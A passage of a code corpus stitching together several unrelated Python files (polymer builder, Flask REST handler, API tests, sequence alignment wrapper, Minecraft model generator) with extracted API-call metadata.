"Please specify a positive number of custom polymer chain types you wish to build"
)
return False
if l[0] == "chain_type":
if "chain" not in polymer_type_custom:
polymer_type_custom["chain"] = {}
num_chain += 1
if len(l[1:]) > 1:
if num_chain not in polymer_type_custom["chain"]:
polymer_type_custom["chain"][num_chain] = {}
if "arrangement" not in polymer_type_custom["chain"][num_chain]:
polymer_type_custom["chain"][num_chain]["arrangement"] = {}
if int(l[1]) == 0:
if int(l[2]) < 1:
print(
"Please specify a positive number of monomers in first pattern for chain type %d"
% num_chain
)
return False
elif int(l[2]) != len(l[3:]):
print(
"Please specify a sequence of %d monomer(s) as repeated pattern for chain type %d"
% (int(l[2]), num_chain)
)
return False
else:
polymer_type_custom["chain"][num_chain]["arrangement"] = {
"type": 0,
"len": int(l[2]),
"sequence": l[3:],
}
elif int(l[1]) == 1:
if polymer_type_custom["num_monomer"] != len(l[2:]):
print(
"Please specify %d probabilities of each monomer arrangement"
% int(l[2])
)
return False
else:
polymer_type_custom["chain"][num_chain]["arrangement"] = {
"type": 1,
"sequence": l[2:],
}
else:
print(
"Please specify chain type %d information with arrangement: 0 = pattern, 1 = probability"
% num_chain
)
return False
else:
print(
"Please specify chain type %d information with arrangement: 0 = pattern, 1 = probability"
% num_chain
)
return False
src.close()
des.write("# Pattern of monomers used to make chains\n")
des.write("stereo s1 pattern 1 m1\n")
des.write("\n")
des.write("# System density in g/cm^3\n")
des.write("density 0.5\n")
des.write("\n")
des.write("# Build this many chains\n")
des.write("chains 0\n")
des.write("\n")
des.write("# Chains have this many monomers\n")
des.write("monomers 0\n")
des.write("\n")
des.write("#exclude invert slab <real> <real> <real> <real> <real> <real>\n")
des.write("\n")
des.write("# Distribution of chain types: all chains of type s1\n")
des.write("chain_stereo 1 s1 1.0\n")
des.write("\n")
des.write("# Size of system grid\n")
des.write("grid_size 6.0\n")
des.write("\n")
des.write("# Chain packing algorithm\n")
des.write("sample monte_carlo\n")
des.write("\n")
des.write("# Sample this many Monte Carlo configurations\n")
des.write("configs 50\n")
des.write("\n")
des.write("# Energy expression: Lennard-Jones\n")
des.write("energy LJ\n")
des.write("\n")
des.write("# Energy cutoff (Angstroms)\n")
des.write("energy_cutoff 6.0\n")
des.write("\n")
des.write("# RNG seed; if commented out, or zero, use current time\n")
des.write("#rng_seed 0\n")
des.write("\n")
des.write("# Output\n")
des.write("# Write an output PDB file with NON-periodic atomic positions\n")
des.write("#write unwrapped_pdb\n")
des.write("#write wrapped_pdb | unwrapped_pdb | wrapped_xyz | unwrapped_xyz\n")
des.write("\n")
des.write("# Write intermediate files for input to Chunyu's code\n")
des.write("write intermediate\n")
des.write("\n")
des.write("# Log output messages to this file; default is stdout\n")
des.write("#log_file <path>\n")
des.write("\n")
des.write("# Log status messages to this file; default is stdout\n")
des.write("#status_file <path>\n")
des.write("\n")
des.close()
return polymer_custom_output, polymer_type_custom
def success_run_polymod(infile):
try:
main([infile])
return True
except KeyError:
return False
def get_connectivity(path):
bonds = readbond(path)
connectivity = {}
for bond in bonds:
atom1 = bond[0]
atom2 = bond[1]
if atom1 not in connectivity:
connectivity[atom1] = []
connectivity[atom1].append(atom2)
if atom2 not in connectivity:
connectivity[atom2] = []
connectivity[atom2].append(atom1)
return connectivity
def run_polymod(infile, validate_bond=False):
while not success_run_polymod(infile):
pass
if validate_bond:
h = readPDB(".tmp/chains_unwrapped.pdb")
while not validate_bonds(h.pos, ".tmp/bonds.dat"):
while not success_run_polymod(infile):
pass
h = readPDB(".tmp/chains_unwrapped.pdb")
# return h
# os.system('./polybuild run_file.txt')
# return_code = subprocess.Popen('./polybuild run_file.txt > out', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# return return_code
def read_latchout(ifile, Dir={}):
src = open(ifile)
m_flag = 0
mD_flag = 0
mD_count = 0
m_id = 0
for line in src.readlines():
ln = line.split()
if len(ln) == 4 and ln[1] == "known" and ln[2] == "atom" and ln[3] == "types:":
Dir["atom_type"] = int(ln[0])
if len(ln) == 2 and ln[0] == "Monomer" and ln[1][0] == "m":
mD_flag = 0
m_flag = 1
m_id = int(ln[1][1:-1])
if "monomer" not in Dir:
Dir["monomer"] = {}
if m_id not in Dir["monomer"]:
Dir["monomer"][m_id] = {}
Dir["monomer"][m_id]["info"] = {}
continue
if (
m_flag
and len(ln) == 5
and ln[0] == "Internal"
and ln[1] == "coordinates"
and ln[2] == "with"
and ln[3] == "Dreiding"
and ln[4] == "types:"
):
mD_flag = 1
continue
if mD_flag and len(ln) == 3 and ln[1] == "backbone" and ln[2] == "atoms":
mD_flag = 0
mD_count = 0
if "torsion" not in Dir["monomer"][m_id]:
Dir["monomer"][m_id]["torsion"] = {}
Dir["monomer"][m_id]["torsion"]["len"] = int(ln[0])
if mD_flag:
Dir["monomer"][m_id]["info"][mD_count] = ln
mD_count += 1
if (
len(ln) == 7
and ln[0] == "mass"
and ln[1] == "(without"
and ln[2] == "head"
and ln[3] == "and"
and ln[4] == "tail):"
and ln[6] == "amu"
):
Dir["monomer"][m_id]["mass"] = eval(ln[5])
src.close()
return Dir
|
[
"polymerxtal.polymod.main",
"polymerxtal.polymod.readPDB"
] |
[((11465, 11479), 'polymerxtal.polymod.main', 'main', (['[infile]'], {}), '([infile])\n', (11469, 11479), False, 'from polymerxtal.polymod import main, readPDB\n'), ((12089, 12125), 'polymerxtal.polymod.readPDB', 'readPDB', (['""".tmp/chains_unwrapped.pdb"""'], {}), "('.tmp/chains_unwrapped.pdb')\n", (12096, 12125), False, 'from polymerxtal.polymod import main, readPDB\n'), ((12275, 12311), 'polymerxtal.polymod.readPDB', 'readPDB', (['""".tmp/chains_unwrapped.pdb"""'], {}), "('.tmp/chains_unwrapped.pdb')\n", (12282, 12311), False, 'from polymerxtal.polymod import main, readPDB\n')]
|
# -*- coding: utf-8 -*-
"""
Madame.handler.collections
~~~~~~~~~~
Handler for collections.
:copyright: (c) 2012 by <NAME>.
:license: MIT, see LICENSE for more details.
"""
from datetime import datetime
from flask.helpers import json
from flask.views import MethodView
from madame.response import send_response, send_error
from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link
from madame.validator import Validator
from flask import request
from simplejson import JSONDecodeError
from werkzeug.exceptions import abort
class CollectionsHandler(MethodView):
def __init__(self, app, mongo, response_type='json'):
self.app = app
self.mongo = mongo
def get(self, collection):
"""
Route : GET /<collection>/
Description : Gets the list of documents in the given collection
filtered with the given filters
Returns a list of documents with etag.
"""
if not self.app.config['COLLECTION_GET']:
abort(405)
if collection not in self.app.DOMAINS:
abort(404)
args = request.values.to_dict()
if args:
args, opts = format_args(args)
cursor = self.mongo.db[collection].find(args, **opts)
else:
cursor = self.mongo.db[collection].find(limit=20)
base_url = request.base_url
#: Building response
response = {'links' : [], 'title' :'', 'description' : ''}
if 'title' in self.app.DOMAINS[collection]:
response['title'] = self.app.DOMAINS[collection]['title']
if 'description' in self.app.DOMAINS[collection]:
response['description'] = self.app.DOMAINS[collection]['description']
response['links'].append(get_self_link(
title=response['title'],
base_url=base_url,
description='You are here.',
methods=["GET", "POST", "DELETE"]
))
response['links'].append(get_parent_link(base_url))
for document in cursor:
response['links'].append(get_document_link(document, base_url))
return send_response(response)
def post(self, collection):
"""
Route : POST /<collection>/
Description : Creates a list of documents in the database.
Returns status and _id for each document.
"""
if not self.app.config['COLLECTION_POST']:
abort(405)
if collection not in self.app.DOMAINS:
abort(404)
if request.mimetype != 'application/json':
return send_error(415, "JSON_NEEDED", "Accepted media type : application/json")
data = request.data
if not data:
return send_error(400, "EMPTY_DATA")
if isinstance(data, str) or isinstance(data, unicode):
try:
data = json.loads(data)
except JSONDecodeError:
return send_error(400, "BAD_JSON_FORMAT")
if isinstance(data, dict):
status = self.validate(data, collection)
if status['created']:
base_url = request.base_url
response = {'title': "Document created", 'links': []}
response['links'].append(get_self_link(
title=self.app.DOMAINS[collection]['title'],
base_url=base_url,
description='You are here.',
methods=["GET", "POST", "DELETE"]
))
response['links'].append(get_document_link(status['document'], base_url))
return send_response(response, 201, get_etag(status['document']))
else:
return send_error(400, "VALIDATION_ERROR", status['issues'])
return send_error(400, "BAD_DATA_FORMAT")
def delete(self, collection):
"""
Route : DELETE /<collection>/
Description : Deletes every document in the given collection.
Returns status
"""
if not self.app.config['COLLECTION_DELETE']:
abort(405)
if collection not in self.app.DOMAINS:
abort(404)
self.mongo.db[collection].drop()
return send_response('')
def validate(self, item, collection):
date_utc = datetime.utcnow()
v = Validator()
if v.validate(item, self.app.DOMAINS[collection]['schema']):
item['created'] = item['updated'] = date_utc
id = self.mongo.db[collection].insert(item)
item = self.mongo.db[collection].find_one({"_id" : id})
response = ({'created' : True, 'document' : item})
else:
response = ({'created' : False, 'issues' : v.error})
return response
|
[
"flask.request.values.to_dict",
"werkzeug.exceptions.abort",
"flask.helpers.json.loads",
"madame.response.send_error",
"madame.response.send_response",
"madame.utils.get_document_link",
"datetime.datetime.utcnow",
"madame.utils.get_etag",
"madame.utils.get_parent_link",
"madame.utils.get_self_link",
"madame.validator.Validator",
"madame.utils.format_args"
] |
[((1144, 1168), 'flask.request.values.to_dict', 'request.values.to_dict', ([], {}), '()\n', (1166, 1168), False, 'from flask import request\n'), ((2164, 2187), 'madame.response.send_response', 'send_response', (['response'], {}), '(response)\n', (2177, 2187), False, 'from madame.response import send_response, send_error\n'), ((3799, 3833), 'madame.response.send_error', 'send_error', (['(400)', '"""BAD_DATA_FORMAT"""'], {}), "(400, 'BAD_DATA_FORMAT')\n", (3809, 3833), False, 'from madame.response import send_response, send_error\n'), ((4228, 4245), 'madame.response.send_response', 'send_response', (['""""""'], {}), "('')\n", (4241, 4245), False, 'from madame.response import send_response, send_error\n'), ((4308, 4325), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (4323, 4325), False, 'from datetime import datetime\n'), ((4338, 4349), 'madame.validator.Validator', 'Validator', ([], {}), '()\n', (4347, 4349), False, 'from madame.validator import Validator\n'), ((1047, 1057), 'werkzeug.exceptions.abort', 'abort', (['(405)'], {}), '(405)\n', (1052, 1057), False, 'from werkzeug.exceptions import abort\n'), ((1118, 1128), 'werkzeug.exceptions.abort', 'abort', (['(404)'], {}), '(404)\n', (1123, 1128), False, 'from werkzeug.exceptions import abort\n'), ((1211, 1228), 'madame.utils.format_args', 'format_args', (['args'], {}), '(args)\n', (1222, 1228), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n'), ((1800, 1926), 'madame.utils.get_self_link', 'get_self_link', ([], {'title': "response['title']", 'base_url': 'base_url', 'description': '"""You are here."""', 'methods': "['GET', 'POST', 'DELETE']"}), "(title=response['title'], base_url=base_url, description=\n 'You are here.', methods=['GET', 'POST', 'DELETE'])\n", (1813, 1926), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n'), ((2014, 2039), 'madame.utils.get_parent_link', 'get_parent_link', (['base_url'], {}), '(base_url)\n', (2029, 2039), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n'), ((2462, 2472), 'werkzeug.exceptions.abort', 'abort', (['(405)'], {}), '(405)\n', (2467, 2472), False, 'from werkzeug.exceptions import abort\n'), ((2533, 2543), 'werkzeug.exceptions.abort', 'abort', (['(404)'], {}), '(404)\n', (2538, 2543), False, 'from werkzeug.exceptions import abort\n'), ((2614, 2686), 'madame.response.send_error', 'send_error', (['(415)', '"""JSON_NEEDED"""', '"""Accepted media type : application/json"""'], {}), "(415, 'JSON_NEEDED', 'Accepted media type : application/json')\n", (2624, 2686), False, 'from madame.response import send_response, send_error\n'), ((2755, 2784), 'madame.response.send_error', 'send_error', (['(400)', '"""EMPTY_DATA"""'], {}), "(400, 'EMPTY_DATA')\n", (2765, 2784), False, 'from madame.response import send_response, send_error\n'), ((4090, 4100), 'werkzeug.exceptions.abort', 'abort', (['(405)'], {}), '(405)\n', (4095, 4100), False, 'from werkzeug.exceptions import abort\n'), ((4161, 4171), 'werkzeug.exceptions.abort', 'abort', (['(404)'], {}), '(404)\n', (4166, 4171), False, 'from werkzeug.exceptions import abort\n'), ((2110, 2147), 'madame.utils.get_document_link', 'get_document_link', (['document', 'base_url'], {}), '(document, base_url)\n', (2127, 2147), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n'), ((2888, 2904), 'flask.helpers.json.loads', 'json.loads', (['data'], {}), '(data)\n', (2898, 2904), False, 'from flask.helpers import json\n'), ((3730, 3783), 'madame.response.send_error', 'send_error', (['(400)', '"""VALIDATION_ERROR"""', "status['issues']"], {}), "(400, 'VALIDATION_ERROR', status['issues'])\n", (3740, 3783), False, 'from madame.response import send_response, send_error\n'), ((2964, 2998), 'madame.response.send_error', 'send_error', (['(400)', '"""BAD_JSON_FORMAT"""'], {}), "(400, 'BAD_JSON_FORMAT')\n", (2974, 2998), False, 'from madame.response import send_response, send_error\n'), ((3276, 3422), 'madame.utils.get_self_link', 'get_self_link', ([], {'title': "self.app.DOMAINS[collection]['title']", 'base_url': 'base_url', 'description': '"""You are here."""', 'methods': "['GET', 'POST', 'DELETE']"}), "(title=self.app.DOMAINS[collection]['title'], base_url=\n base_url, description='You are here.', methods=['GET', 'POST', 'DELETE'])\n", (3289, 3422), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n'), ((3558, 3605), 'madame.utils.get_document_link', 'get_document_link', (["status['document']", 'base_url'], {}), "(status['document'], base_url)\n", (3575, 3605), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n'), ((3659, 3687), 'madame.utils.get_etag', 'get_etag', (["status['document']"], {}), "(status['document'])\n", (3667, 3687), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n')]
|
"""Docstring in public module."""
import os
import sys
import ujson as json
from tornado.testing import AsyncHTTPTestCase
APP_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
sys.path.append(os.path.join(APP_ROOT, ".."))
class TestPoliciesApi(AsyncHTTPTestCase):
def get_app(self):
from consoleme.routes import make_app
return make_app(jwt_validator=lambda x: {})
def test_policies_api(self):
from consoleme.config import config
headers = {
config.get("auth.user_header_name"): "<EMAIL>",
config.get("auth.groups_header_name"): "groupa,groupb,groupc",
}
body = json.dumps({"filters": {}})
response = self.fetch(
"/api/v2/policies?markdown=true", headers=headers, method="POST", body=body
)
self.assertEqual(response.code, 200)
response_j = json.loads(response.body)
self.assertEqual(len(response_j), 16)
first_entity = response_j[0]
self.assertEqual(first_entity["account_id"], "123456789012")
self.assertEqual(first_entity["account_name"], "default_account")
def test_policies_check_api(self):
from consoleme.config import config
headers = {
config.get("auth.user_header_name"): "<EMAIL>",
config.get("auth.groups_header_name"): "groupa,groupb,groupc",
}
body = """{
"Version": "2012-10-17",
"Statement": {
"Effect": "Allow",
"Action":["s3:GetObject"],
"Resource": ["arn:aws:s3:::bucket1"]
}
}"""
response = self.fetch(
"/api/v2/policies/check", headers=headers, method="POST", body=body
)
self.assertEqual(response.code, 200)
response_j = json.loads(response.body)
self.assertEqual(len(response_j), 1)
first_error = response_j[0]
self.assertEqual(first_error["issue"], "RESOURCE_MISMATCH")
self.assertEqual(
first_error["title"], "No resources match for the given action"
)
self.assertEqual(first_error["severity"], "MEDIUM")
|
[
"os.path.dirname",
"ujson.loads",
"consoleme.routes.make_app",
"consoleme.config.config.get",
"ujson.dumps",
"os.path.join"
] |
[((214, 242), 'os.path.join', 'os.path.join', (['APP_ROOT', '""".."""'], {}), "(APP_ROOT, '..')\n", (226, 242), False, 'import os\n'), ((164, 189), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (179, 189), False, 'import os\n'), ((373, 409), 'consoleme.routes.make_app', 'make_app', ([], {'jwt_validator': '(lambda x: {})'}), '(jwt_validator=lambda x: {})\n', (381, 409), False, 'from consoleme.routes import make_app\n'), ((669, 696), 'ujson.dumps', 'json.dumps', (["{'filters': {}}"], {}), "({'filters': {}})\n", (679, 696), True, 'import ujson as json\n'), ((892, 917), 'ujson.loads', 'json.loads', (['response.body'], {}), '(response.body)\n', (902, 917), True, 'import ujson as json\n'), ((1823, 1848), 'ujson.loads', 'json.loads', (['response.body'], {}), '(response.body)\n', (1833, 1848), True, 'import ujson as json\n'), ((521, 556), 'consoleme.config.config.get', 'config.get', (['"""auth.user_header_name"""'], {}), "('auth.user_header_name')\n", (531, 556), False, 'from consoleme.config import config\n'), ((581, 618), 'consoleme.config.config.get', 'config.get', (['"""auth.groups_header_name"""'], {}), "('auth.groups_header_name')\n", (591, 618), False, 'from consoleme.config import config\n'), ((1261, 1296), 'consoleme.config.config.get', 'config.get', (['"""auth.user_header_name"""'], {}), "('auth.user_header_name')\n", (1271, 1296), False, 'from consoleme.config import config\n'), ((1321, 1358), 'consoleme.config.config.get', 'config.get', (['"""auth.groups_header_name"""'], {}), "('auth.groups_header_name')\n", (1331, 1358), False, 'from consoleme.config import config\n')]
|
import pulsar as psr
def load_ref_system():
""" Returns l-valine as found in the IQMol fragment library.
All credit to https://github.com/nutjunkie/IQmol
"""
return psr.make_system("""
C 0.2036 -0.4958 0.3403
N 1.4832 -1.2440 0.2997
C 0.3147 0.9660 0.8346
C -1.0593 1.6179 0.8658
C 0.9346 1.0303 2.2224
C -0.3596 -0.5230 -1.0775
O 0.1045 -0.0437 -2.0961
O -1.5354 -1.1775 -1.2134
H -0.4768 -1.0587 1.0299
H 1.8309 -1.3539 1.2292
H 2.1548 -0.7502 -0.2505
H 0.9641 1.5372 0.1249
H -1.5332 1.6117 -0.1249
H -0.9924 2.6651 1.1892
H -1.7373 1.1021 1.5594
H 0.9116 2.0570 2.6127
H 1.9862 0.7132 2.2244
H 0.3950 0.3965 2.9394
H -1.8067 -1.1757 -2.1262
""")
|
[
"pulsar.make_system"
] |
[((185, 1101), 'pulsar.make_system', 'psr.make_system', (['"""\n C 0.2036 -0.4958 0.3403\n N 1.4832 -1.2440 0.2997\n C 0.3147 0.9660 0.8346\n C -1.0593 1.6179 0.8658\n C 0.9346 1.0303 2.2224\n C -0.3596 -0.5230 -1.0775\n O 0.1045 -0.0437 -2.0961\n O -1.5354 -1.1775 -1.2134\n H -0.4768 -1.0587 1.0299\n H 1.8309 -1.3539 1.2292\n H 2.1548 -0.7502 -0.2505\n H 0.9641 1.5372 0.1249\n H -1.5332 1.6117 -0.1249\n H -0.9924 2.6651 1.1892\n H -1.7373 1.1021 1.5594\n H 0.9116 2.0570 2.6127\n H 1.9862 0.7132 2.2244\n H 0.3950 0.3965 2.9394\n H -1.8067 -1.1757 -2.1262\n """'], {}), '(\n """\n C 0.2036 -0.4958 0.3403\n N 1.4832 -1.2440 0.2997\n C 0.3147 0.9660 0.8346\n C -1.0593 1.6179 0.8658\n C 0.9346 1.0303 2.2224\n C -0.3596 -0.5230 -1.0775\n O 0.1045 -0.0437 -2.0961\n O -1.5354 -1.1775 -1.2134\n H -0.4768 -1.0587 1.0299\n H 1.8309 -1.3539 1.2292\n H 2.1548 -0.7502 -0.2505\n H 0.9641 1.5372 0.1249\n H -1.5332 1.6117 -0.1249\n H -0.9924 2.6651 1.1892\n H -1.7373 1.1021 1.5594\n H 0.9116 2.0570 2.6127\n H 1.9862 0.7132 2.2244\n H 0.3950 0.3965 2.9394\n H -1.8067 -1.1757 -2.1262\n """\n )\n', (200, 1101), True, 'import pulsar as psr\n')]
|
from os.path import exists, dirname, basename, join, abspath
from os import remove
from multiprocessing import cpu_count
from subprocess import run, PIPE
def align_minimap(ref_sequence_path, reads_sequence_path, max_threads=None, output_dir=None, preset="map-ont", sam_only=False, k=15):
"""
Given a reference file and reads file align using minimap, generating a
:param ref_sequence_path:
:param reads_sequence_path:
:param output_dir:
:return:
"""
if max_threads is None:
max_threads = max(1, cpu_count() - 2)
max_threads = str(max_threads)
ref_sequence_path = abspath(ref_sequence_path)
reads_sequence_path = abspath(reads_sequence_path)
print("\n-------- ALIGNING --------\n")
ref_sequence_filename_prefix = basename(ref_sequence_path)
ref_sequence_filename_prefix = "_".join(ref_sequence_filename_prefix.split(".")[:-1])
input_filename_prefix = basename(reads_sequence_path)
input_filename_prefix = "_".join(input_filename_prefix.split(".")[:-1])
output_filename_prefix = input_filename_prefix + "_VS_" + ref_sequence_filename_prefix
# ---- Minimap -----------
output_filename = output_filename_prefix + ".sam"
output_file_path = join(output_dir, output_filename)
arguments = ["minimap2", "-a", "-t", max_threads, "-x", preset, "-k", str(k), ref_sequence_path, reads_sequence_path]
print("\nRUNNING: ", " ".join(arguments))
with open(output_file_path, "w") as output_file:
print("REDIRECTING TO: ", output_file_path, "\n")
run(arguments, cwd=output_dir, stdout=output_file, check=True)
if sam_only:
print("||||||||||||||||||||||||||| SAM ONLY ||||||||||||||||||||||||||| ")
# end early if specified (for Racon)
output_sam_file_path = abspath(join(output_dir, output_filename_prefix + ".sam"))
return output_sam_file_path
# ---- Sort SAM ----------
input_filename = output_filename
output_filename = output_filename_prefix + ".sorted.sam"
arguments = ["samtools", "sort", input_filename, "-@", max_threads, "-O", "SAM", "-o", output_filename]
print("\nRUNNING: ", " ".join(arguments))
run(arguments, cwd=output_dir, check=True)
# ---- Convert to BAM ----
input_filename = output_filename
output_filename = output_filename_prefix + ".sorted.bam"
output_file_path = join(output_dir, output_filename)
arguments = ["samtools", "view", input_filename, "-O", "BAM", "-@", max_threads]
print("\nRUNNING: ", " ".join(arguments))
with open(output_file_path, "w") as output_file:
print("REDIRECTING TO: ", output_file_path, "\n")
run(arguments, cwd=output_dir, stdout=output_file, check=True)
# ---- Index --------------
input_filename = output_filename
arguments = ["samtools", "index", input_filename]
print("\nRUNNING: ", " ".join(arguments))
run(arguments, cwd=output_dir, check=True)
output_sam_file_path = abspath(join(output_dir, output_filename_prefix + ".sorted.sam"))
output_bam_file_path = abspath(join(output_dir, output_filename_prefix + ".sorted.bam"))
return output_sam_file_path, output_bam_file_path
|
[
"subprocess.run",
"os.path.abspath",
"os.path.basename",
"os.path.join",
"multiprocessing.cpu_count"
] |
[((616, 642), 'os.path.abspath', 'abspath', (['ref_sequence_path'], {}), '(ref_sequence_path)\n', (623, 642), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((669, 697), 'os.path.abspath', 'abspath', (['reads_sequence_path'], {}), '(reads_sequence_path)\n', (676, 697), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((779, 806), 'os.path.basename', 'basename', (['ref_sequence_path'], {}), '(ref_sequence_path)\n', (787, 806), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((926, 955), 'os.path.basename', 'basename', (['reads_sequence_path'], {}), '(reads_sequence_path)\n', (934, 955), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((1233, 1266), 'os.path.join', 'join', (['output_dir', 'output_filename'], {}), '(output_dir, output_filename)\n', (1237, 1266), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((2184, 2226), 'subprocess.run', 'run', (['arguments'], {'cwd': 'output_dir', 'check': '(True)'}), '(arguments, cwd=output_dir, check=True)\n', (2187, 2226), False, 'from subprocess import run, PIPE\n'), ((2381, 2414), 'os.path.join', 'join', (['output_dir', 'output_filename'], {}), '(output_dir, output_filename)\n', (2385, 2414), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((2908, 2950), 'subprocess.run', 'run', (['arguments'], {'cwd': 'output_dir', 'check': '(True)'}), '(arguments, cwd=output_dir, check=True)\n', (2911, 2950), False, 'from subprocess import run, PIPE\n'), ((1557, 1619), 'subprocess.run', 'run', (['arguments'], {'cwd': 'output_dir', 'stdout': 'output_file', 'check': '(True)'}), '(arguments, cwd=output_dir, stdout=output_file, check=True)\n', (1560, 1619), False, 'from subprocess import run, PIPE\n'), ((2668, 2730), 'subprocess.run', 'run', (['arguments'], {'cwd': 'output_dir', 'stdout': 'output_file', 'check': '(True)'}), '(arguments, cwd=output_dir, stdout=output_file, check=True)\n', (2671, 2730), False, 'from subprocess import run, PIPE\n'), ((2987, 3043), 'os.path.join', 'join', (['output_dir', "(output_filename_prefix + '.sorted.sam')"], {}), "(output_dir, output_filename_prefix + '.sorted.sam')\n", (2991, 3043), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((3080, 3136), 'os.path.join', 'join', (['output_dir', "(output_filename_prefix + '.sorted.bam')"], {}), "(output_dir, output_filename_prefix + '.sorted.bam')\n", (3084, 3136), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((1805, 1854), 'os.path.join', 'join', (['output_dir', "(output_filename_prefix + '.sam')"], {}), "(output_dir, output_filename_prefix + '.sam')\n", (1809, 1854), False, 'from os.path import exists, dirname, basename, join, abspath\n'), ((538, 549), 'multiprocessing.cpu_count', 'cpu_count', ([], {}), '()\n', (547, 549), False, 'from multiprocessing import cpu_count\n')]
|
import os
import ptvsd
import platform
import asyncio
import logging
from aiorun import run
from injector import Injector
from .logger import getLogger, CONSOLE, HISTORY
from backup.config import Config, Setting
from backup.module import MainModule, BaseModule
from backup.starter import Starter
from time import sleep
from sys import argv
from os.path import join, abspath
logger = getLogger(__name__)
async def main(config):
await Injector([BaseModule(config), MainModule()]).get(Starter).startup()
while True:
await asyncio.sleep(1)
if __name__ == '__main__':
config = Config()
if len(argv) > 1:
# Needed to load a different config for dev environments.
config = Config.withFileOverrides(abspath(join(__file__, "../../dev/data", argv[1] + "_options.json")))
else:
config = Config.fromFile(Setting.CONFIG_FILE_PATH.default())
logger.overrideLevel(config.get(Setting.CONSOLE_LOG_LEVEL), config.get(Setting.LOG_LEVEL))
if config.get(Setting.DEBUGGER_PORT) is not None:
port = config.get(Setting.DEBUGGER_PORT)
logger.info("Starting debugger on port {}".format(port))
ptvsd.enable_attach(('0.0.0.0', port))
if platform.system() == "Windows":
# Needed for dev on windows machines
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
asyncio.run(main(config))
else:
run(main(config))
|
[
"backup.config.Config",
"ptvsd.enable_attach",
"asyncio.sleep",
"backup.module.BaseModule",
"backup.module.MainModule",
"backup.config.Setting.CONFIG_FILE_PATH.default",
"platform.system",
"os.path.join",
"asyncio.WindowsSelectorEventLoopPolicy"
] |
[((600, 608), 'backup.config.Config', 'Config', ([], {}), '()\n', (606, 608), False, 'from backup.config import Config, Setting\n'), ((1165, 1203), 'ptvsd.enable_attach', 'ptvsd.enable_attach', (["('0.0.0.0', port)"], {}), "(('0.0.0.0', port))\n", (1184, 1203), False, 'import ptvsd\n'), ((1212, 1229), 'platform.system', 'platform.system', ([], {}), '()\n', (1227, 1229), False, 'import platform\n'), ((541, 557), 'asyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (554, 557), False, 'import asyncio\n'), ((853, 887), 'backup.config.Setting.CONFIG_FILE_PATH.default', 'Setting.CONFIG_FILE_PATH.default', ([], {}), '()\n', (885, 887), False, 'from backup.config import Config, Setting\n'), ((1327, 1367), 'asyncio.WindowsSelectorEventLoopPolicy', 'asyncio.WindowsSelectorEventLoopPolicy', ([], {}), '()\n', (1365, 1367), False, 'import asyncio\n'), ((748, 807), 'os.path.join', 'join', (['__file__', '"""../../dev/data"""', "(argv[1] + '_options.json')"], {}), "(__file__, '../../dev/data', argv[1] + '_options.json')\n", (752, 807), False, 'from os.path import join, abspath\n'), ((453, 471), 'backup.module.BaseModule', 'BaseModule', (['config'], {}), '(config)\n', (463, 471), False, 'from backup.module import MainModule, BaseModule\n'), ((473, 485), 'backup.module.MainModule', 'MainModule', ([], {}), '()\n', (483, 485), False, 'from backup.module import MainModule, BaseModule\n')]
|
from mcresources import ResourceManager
from mcresources import utils
def generate(rm: ResourceManager):
vanilla_woods = ('oak', 'acacia', 'dark_oak', 'birch', 'jungle', 'spruce')
for wood in vanilla_woods:
direct_block_model(rm, 'betterfoliage:%s_leaves' % wood, {
'loader': 'betterfoliage:leaves',
'leaves': 'minecraft:block/%s_leaves' % wood,
'fluff': 'betterfoliage:block/%s_fluff' % wood
})
rm.blockstate('minecraft:%s_leaves' % wood, model='betterfoliage:block/%s_leaves' % wood)
pad = 0
for flower in range(0, 1 + 1):
for root in range(0, 2 + 1):
rm.block_model('betterfoliage:lily_pad%d' % pad, parent='betterfoliage:block/lily_pad', textures={
'flower': 'betterfoliage:block/lilypad_flower%d' % flower,
'roots': 'betterfoliage:block/lilypad_roots%d' % root
})
pad += 1
cactus_variants = [{'model': 'minecraft:block/cactus', 'weight': 3, 'y': i} for i in (0, 90, 180, 270)]
cactus_variants.extend([{'model': 'betterfoliage:block/cactus1', 'weight': 2, 'y': i} for i in (0, 90, 180, 270)])
cactus_variants.extend([{'model': 'betterfoliage:block/cactus2', 'weight': 4, 'y': i} for i in (0, 90, 180, 270)])
cactus_variants.extend([{'model': 'betterfoliage:block/cactus3', 'y': i} for i in (0, 90, 180, 270)])
cactus_variants.extend([{'model': 'betterfoliage:block/cactus4', 'y': i} for i in (0, 90, 180, 270)])
cactus_variants.extend([{'model': 'betterfoliage:block/cactus5', 'y': i} for i in (0, 90, 180, 270)])
rm.blockstate('minecraft:cactus', variants={"": cactus_variants}, use_default_model=False)
rm.blockstate('minecraft:grass_block', variants={
'snowy=false': {'model': 'betterfoliage:block/grass_block'},
'snowy=true': {'model': 'betterfoliage:block/snowy_grass_block'}
})
rm.blockstate('minecraft:mycelium', variants={
'snowy=false': {'model': 'betterfoliage:block/mycelium'},
'snowy=true': {'model': 'betterfoliage:block/snowy_grass_block'}
})
rm.blockstate('minecraft:podzol', variants={
'snowy=false': {'model': 'betterfoliage:block/podzol'},
'snowy=true': {'model': 'betterfoliage:block/snowy_grass_block'}
})
direct_block_model(rm, 'betterfoliage:grass_block', {
'loader': 'betterfoliage:grass',
